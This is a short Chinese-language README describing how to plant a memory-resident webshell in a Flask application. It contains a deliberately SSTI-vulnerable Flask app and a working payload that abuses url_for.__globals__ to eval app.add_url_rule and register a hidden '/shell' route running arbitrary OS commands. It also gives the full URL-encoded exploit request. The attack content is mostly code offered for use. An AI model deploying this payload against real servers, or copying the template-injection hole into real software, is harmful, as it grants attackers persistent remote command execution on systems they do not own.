└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # Flask 内存马 2 | 3 | 4 | 5 | 一直遇到java打内存马的情景,想起来Flask也可以搞一个内存马试试。 6 | 7 | 模拟一个存在SSTI的Flask环境 8 | 9 | ```python 10 | from flask import Flask,request 11 | from flask import render_template_string 12 | app = Flask(__name__) 13 | 14 | @app.route('/') 15 | def hello_world(): 16 | return 'Hello World' 17 | 18 | 19 | @app.route('/test',methods=['GET', 'POST']) 20 | def test(): 21 | template = ''' 22 |
23 |

Oops! That page doesn't exist.

24 |

%s

25 |
26 | ''' %(request.values.get('fxxk')) 27 | 28 | return render_template_string(template) 29 | 30 | 31 | if __name__ == '__main__': 32 | app.run() 33 | ``` 34 | 35 | 使用app.add_url_rule动态添加一个路由,请求上下文在_request_ctx_stack的栈里 36 | 37 | payload: 38 | 39 | ``` 40 | url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']}) 41 | ``` 42 | 43 | 44 | 45 | ## 流程: 46 | 47 | 打SSTI payload 48 | 49 | ``` 50 | http://127.0.0.1:5000/test?fxxk={{url_for.__globals__[%27__builtins__%27][%27eval%27](%22app.add_url_rule(%27/shell%27,%20%27shell%27,%20lambda%20:__import__(%27os%27).popen(_request_ctx_stack.top.request.args.get(%27cmd%27,%20%27whoami%27)).read())%22,{%27_request_ctx_stack%27:url_for.__globals__[%27_request_ctx_stack%27],%27app%27:url_for.__globals__[%27current_app%27]})}} 51 | ``` 52 | 53 | 访问/shell内存马地址: 54 | 55 | ![image-20210326182004878](https://static.hexlt.org/img/20210326182010.png) 56 | 57 | ## 参考: 58 | 59 | Flask上下文管理机制: https://www.cnblogs.com/bigox/p/11652859.html 60 | --------------------------------------------------------------------------------